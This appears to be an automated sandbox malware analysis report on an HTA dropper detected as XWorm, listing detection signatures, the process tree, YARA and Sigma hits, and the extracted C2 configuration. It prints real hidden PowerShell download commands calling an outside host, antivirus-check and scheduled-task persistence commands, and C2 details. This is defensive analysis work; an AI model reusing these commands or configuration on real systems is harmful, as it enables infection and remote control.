Edit tour

Windows Analysis Report
c2.hta

Overview

General Information

Sample name:	c2.hta
Analysis ID:	1572230
MD5:	4eb412ad93706e0c425f95cd83c34102
SHA1:	92304ce0960c7f12e9f865eb18a92b9cc1550941
SHA256:	f3408814ea583472da2988651a76480aef59d405e45bd8021bae688e97c008c2
Tags:	htauser-abuse_ch
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Drops script at startup location

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Drops large PE files

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Powershell drops PE file

Sample uses string decryption to hide its real strings

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Legitimate Application Dropped Script

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious powershell command line found

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Sigma detected: PowerShell Web Download

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 3992 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 2716 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\downloaded.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6756 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

Acrobat.exe (PID: 984 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 1440 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 7204 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1512,i,15955159168811455781,12168193802298168487,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

powershell.exe (PID: 6192 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 4524 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

msword.exe (PID: 6508 cmdline: msword.exe MD5: C744E054E4EF01832BBF43B81D397B61)

cmd.exe (PID: 7960 cmdline: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 4324 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 4296 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 828 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6464 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 1788 cmdline: cmd /c md 220239 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 6688 cmdline: findstr /V "DimPieLilHot" Statistical MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 8164 cmdline: cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Carter.pif (PID: 5900 cmdline: Carter.pif F MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cmd.exe (PID: 5052 cmdline: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1264 cmdline: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 6580 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7416 cmdline: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

choice.exe (PID: 5240 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

wscript.exe (PID: 4984 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

DanielPulse.scr (PID: 2612 cmdline: "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

wscript.exe (PID: 1172 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

DanielPulse.scr (PID: 4228 cmdline: "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["me-work.com"], "Port": 7007, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000018.00000003.3881968473.0000000004261000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000018.00000003.3881968473.0000000004261000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9070:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14a78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x910d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14b15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9222:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x14c2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8a4c:$cnc4: POST / HTTP/1.1 0x14454:$cnc4: POST / HTTP/1.1
00000018.00000003.3881936961.00000000042C2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000018.00000003.3881936961.00000000042C2000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x95d8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14de0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9675:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14e7d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x978a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x14f92:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8fb4:$cnc4: POST / HTTP/1.1 0x147bc:$cnc4: POST / HTTP/1.1
00000023.00000002.4498694614.0000000000762000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000023.00000002.4498694614.0000000000762000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9e18:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9eb5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9fca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x97f4:$cnc4: POST / HTTP/1.1
00000018.00000002.4500843743.000000000426B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000018.00000002.4500843743.000000000426B000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xaa78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xab15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xac2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa454:$cnc4: POST / HTTP/1.1
00000018.00000003.3881856038.0000000004279000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000018.00000003.3881856038.0000000004279000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa280:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa31d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa432:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9c5c:$cnc4: POST / HTTP/1.1
00000023.00000002.4500241219.00000000029BB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000018.00000003.3826189129.0000000001B47000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000018.00000003.3826189129.0000000001B47000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa038:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa0d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa1ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9a14:$cnc4: POST / HTTP/1.1
00000023.00000002.4500241219.0000000002971000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000018.00000003.3881856038.0000000004289000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000018.00000003.3881856038.0000000004289000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa288:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x150f8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x425d8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4dde0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa325:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x15195:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x42675:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4de7d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa43a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x152aa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4278a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4df92:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9c64:$cnc4: POST / HTTP/1.1 0x14ad4:$cnc4: POST / HTTP/1.1 0x41fb4:$cnc4: POST / HTTP/1.1 0x4d7bc:$cnc4: POST / HTTP/1.1
Process Memory Space: Carter.pif PID: 5900	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: RegAsm.exe PID: 7416	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
24.2.Carter.pif.426ba60.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
24.2.Carter.pif.426ba60.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa018:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa0b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa1ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x99f4:$cnc4: POST / HTTP/1.1
24.2.Carter.pif.426ba60.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
35.2.RegAsm.exe.760000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
24.2.Carter.pif.426ba60.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8218:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x82b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x83ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7bf4:$cnc4: POST / HTTP/1.1
35.2.RegAsm.exe.760000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa018:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa0b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa1ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x99f4:$cnc4: POST / HTTP/1.1
24.3.Carter.pif.426ba60.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
24.3.Carter.pif.426ba60.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa018:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa0b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa1ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x99f4:$cnc4: POST / HTTP/1.1
24.3.Carter.pif.426ba60.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
24.3.Carter.pif.426ba60.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8218:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x82b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x83ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7bf4:$cnc4: POST / HTTP/1.1
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ParentCommandLine: Carter.pif F, ParentImage: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentProcessId: 5900, ParentProcessName: Carter.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ProcessId: 7416, ProcessName: RegAsm.exe

Sigma detected: Legitimate Application Dropped Script

Source: File created

Author: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 3992, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\c2[1].bat

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5052, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ProcessId: 1264, ProcessName: schtasks.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\downloaded.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2716, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 6756, ProcessName: powershell.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\downloaded.bat", CommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\downloaded.bat", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 3992, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\downloaded.bat", ProcessId: 2716, ProcessName: cmd.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\downloaded.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2716, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile 